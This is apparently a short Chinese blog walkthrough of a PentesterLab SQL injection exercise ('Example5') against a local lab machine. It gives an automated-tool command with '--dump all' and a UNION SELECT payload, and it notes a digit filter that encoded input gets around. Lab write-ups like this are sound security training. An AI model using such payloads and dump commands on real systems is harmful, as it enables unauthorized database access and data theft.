0
点赞
收藏
分享

微信扫一扫

PentestLab-web安全SQL注入-EXP5

酷子腿长一米八 2023-03-17 阅读 36
sqlsql注入php网络安全yyds干货盘点
加载失败


我们打开靶机,选择“sql  injections”

选择“Example5”


PentestLab-web安全SQL注入-EXP5_php


观察页面


PentestLab-web安全SQL注入-EXP5_sql_02



使用工具测试


参数为


-u "http://192.168.29.148/sqli/example5.php?id=2" --dump all


payload为


id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4a4859624e4166537a476246556b4757574375516e647a584a4341486b5a5562614c4d506f4a6e54,0x7162787671),NULL,NULL-- -


明显是经过编码之后的注入

结果


PentestLab-web安全SQL注入-EXP5_sql_03


存在sql注入漏洞


我们打开靶机,

分析源代码


PentestLab-web安全SQL注入-EXP5_php_04


过滤了0-9的数字,但是有些编码并没有过滤掉。

举报

相关推荐

PentestLab-web安全SQL注入-EXP2

sqlpython多行注释网络安全yyds干货盘点

PentestLab-web安全SQL注入-EXP6

sqlphp正则网络安全yyds干货盘点

PentestLab-web安全命令注入-EXP1

php网络安全yyds干货盘点

PentestLab-web安全命令注入-EXP2

php正则IP网络安全yyds干货盘点

PentestLab-web安全目录穿越-EXP2

php修改文件文件名网络安全yyds干货盘点

PentestLab-web安全XML测试-EXP2

xmlphp单引号网络安全yyds干货盘点

PentestLab-web安全LDAP测试-EXP2

用户名数据php网络安全yyds干货盘点

PentestLab-web安全目录穿越-EXP3

后缀名php文件名网络安全yyds干货盘点

PentestLab-web安全文件包含-EXP1

php文件名文件上传网络安全yyds干货盘点

PentestLab-web安全文件包含-EXP2

php文件包含后缀名网络安全yyds干货盘点
0 条评论
加载失败